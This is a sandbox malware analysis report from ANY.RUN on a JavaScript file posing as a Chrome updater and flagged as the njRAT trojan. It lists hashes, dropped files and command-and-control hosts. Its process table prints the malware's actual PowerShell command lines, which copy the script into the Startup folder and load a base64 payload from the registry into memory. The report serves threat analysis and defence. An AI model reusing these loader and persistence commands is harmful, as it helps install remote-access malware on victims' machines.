analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

ChromeUpdater.js

Full analysis: https://app.any.run/tasks/075e1778-e8fd-49d8-9a7f-54d0b63b4fc1
Verdict: Malicious activity
Threats:

njRAT is a remote access trojan. It is one of the most widely accessible RATs on the market that features an abundance of educational information. Interested attackers can even find tutorials on YouTube. This allows it to become one of the most popular RATs in the world.

Analysis date: March 22, 2019, 10:15:44
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
rat
njrat
bladabindi
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines
MD5:

C44E4121F0041FA220EBE597D326A114

SHA1:

7FDB4FB491C97AC60A62E90B5C0B8C4DEEDA56F3

SHA256:

2A88BD732CEA5742580323E6776EA0B2E06FF98989FEB8866B33232FA1EDA55B

SSDEEP:

768:swiyz44PhEQ0wvzpFYnB0JPoE297hSiQIz/Rp4yDZdAmq/tXYrHzf8dbURex0DHm:sdo9J0wvzTyBWwD97m34fUtXS2b8H7i

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Writes to a start menu file

      • powershell.exe (PID: 3848)
    • Connects to CnC server

      • powershell.exe (PID: 4088)
    • NJRAT was detected

      • powershell.exe (PID: 4088)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • WScript.exe (PID: 1848)
    • Creates files in the user directory

      • powershell.exe (PID: 3848)
      • powershell.exe (PID: 4088)
    • Connects to unusual port

      • powershell.exe (PID: 4088)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
35
Monitored processes
3
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe #NJRAT powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
1848"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\ChromeUpdater.js"C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3848"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\ChromeUpdater.js',[System.IO.File]::ReadAllText('C:\Users\admin\AppData\Local\Temp\ChromeUpdater.js'))"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
4088"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'service').service;$_b=$_b.replace('~','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
440
Read events
310
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
4
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
3848powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2TXRAALTAQ8AVSXMQ50G.temp
MD5:
SHA256:
4088powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LFSDMWKZXCS7FWHAQ9UI.temp
MD5:
SHA256:
4088powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf8b10.TMPbinary
MD5:7100C9D54A32DFE02751A9E1BC41F804
SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
4088powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:7100C9D54A32DFE02751A9E1BC41F804
SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
3848powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:7100C9D54A32DFE02751A9E1BC41F804
SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
3848powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf8ae1.TMPbinary
MD5:7100C9D54A32DFE02751A9E1BC41F804
SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
3848powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChromeUpdater.jstext
MD5:C44E4121F0041FA220EBE597D326A114
SHA256:2A88BD732CEA5742580323E6776EA0B2E06FF98989FEB8866B33232FA1EDA55B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
7
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4088
powershell.exe
GET
217.160.0.120:80
http://projectblackhat.com/dns.txt
DE
malicious
4088
powershell.exe
GET
200
217.160.0.120:80
http://projectblackhat.com/dns.txt
DE
text
28 b
malicious
4088
powershell.exe
GET
200
217.160.0.120:80
http://projectblackhat.com/dns.txt
DE
text
28 b
malicious
4088
powershell.exe
GET
200
217.160.0.120:80
http://projectblackhat.com/dns.txt
DE
text
28 b
malicious
4088
powershell.exe
GET
200
217.160.0.120:80
http://projectblackhat.com/dns.txt
DE
text
28 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4088
powershell.exe
217.160.0.120:80
projectblackhat.com
1&1 Internet SE
DE
malicious
4088
powershell.exe
194.5.97.145:21000
holydns.warzonedns.com
FR
malicious

DNS requests

Domain
IP
Reputation
projectblackhat.com
  • 217.160.0.120
malicious
holydns.warzonedns.com
  • 194.5.97.145
malicious

Threats

Found threats are available for the paid subscriptions
2 ETPRO signatures available at the full report
No debug info